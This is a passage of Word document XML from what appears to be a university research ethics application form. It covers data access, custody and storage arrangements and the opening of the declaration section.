      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="771CEC20" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7DBD39CF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F5FBE85" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>List all who will have access to the data generated by the research activity:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="37FD5B05" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9B7279" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="058366B3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D07933B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Associate Professor Carlene Campbell, and Dr Nitheesh Kaliyamurthy, both lecturers at UWTSD Swansea and any external examiners. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A80CBC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="3052BB06" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D9996AD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="583625BD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>List who will have control of, and act as custodian(s) for, data generated by the research activity:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2E2E0768" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DD9637" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7FD8AF4B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36C9BF11" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Myself.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B3BB86" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="32D592F5" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="36DEE0D9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1F64A3ED" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Give details of data storage arrangements, including security measures in place to protect the data, where data will be stored, how long for, and in what form. Will data be archived – if so how and if not why?  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F16C53" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="392EBFF8" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46737C92" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="577ED663" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37F37CA4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Data will be kept on the UWTSD cloud storage system (which has encryption and multiple factor authentication) until the assignment has been marked and verified by external examiners. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13016FE8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="5D77A430" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518758C5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="506568F0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Please indicate if your data will be stored in the UWTSD Research Data Repository (see </w:t>
            </w:r>
            <w:hyperlink r:id="rId156" w:history="1">
              <w:r w:rsidRPr="00E42F41">
                <w:rPr>
                  <w:color w:val="000000"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://researchdata.uwtsd.ac.uk/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> ).   If so, please explain. (</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Most relevant to academic staff)</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="26BCCCA0" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E2BFF2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="02EA8015" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79405EF2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35876865" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="020600D0" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3402D91D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C4FEFD8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Confirm that you have read the UWTSD guidance on data management (see </w:t>
            </w:r>
            <w:hyperlink r:id="rId157" w:history="1">
              <w:r w:rsidRPr="00E42F41">
                <w:rPr>
                  <w:color w:val="000000"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.uwtsd.ac.uk/library/research-data-management/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="51B12828" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="145E5595" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1912113242"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1F7D4775" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B59CA35" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7EAF3842" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="230E2720" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="70FFC6DF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1821611795"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="32E3AED6" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="311"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="242B2374" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="25FBEBB7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Confirm that you are aware that you need to keep all data until after your research has completed or the end of your funding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4C8E8566" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="12A0838F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1277371831"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="09925565" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="311"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="63B70FD2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="00E6E175" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3463E3C7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="77260B74" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="767737168"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DE2C34E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6B6958" w14:textId="0F11FC67" w:rsidR="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:lastRenderedPageBreak/>
        <w:t>SECTION K: Declaration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400CB497" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRPr="00E42F41" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10477"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663E33" w:rsidRPr="00E42F41" w14:paraId="4C427477" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="1807"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="554" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="26B51EED" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D70284B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>The information which I have provided is correct and complete to the best of my knowledge. I have attempted to identify any risks and issues related to the research activity and acknowledge my obligations and the rights of the participants</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C66F95" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31B372A8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">In submitting this application, I hereby confirm that I undertake to ensure that the above named research activity will meet the University’s Research Ethics and Integrity Code of Practice which is published on the website: </w:t>
            </w:r>
            <w:hyperlink r:id="rId158" w:history="1">
              <w:r w:rsidRPr="00E42F41">
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.uwtsd.ac.uk/research/research-ethics/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2B80D9F8" w14:textId="77777777" w:rsidTr="00CA0B92">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cPr>
          <w:p w14:paraId="2C7AE67A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
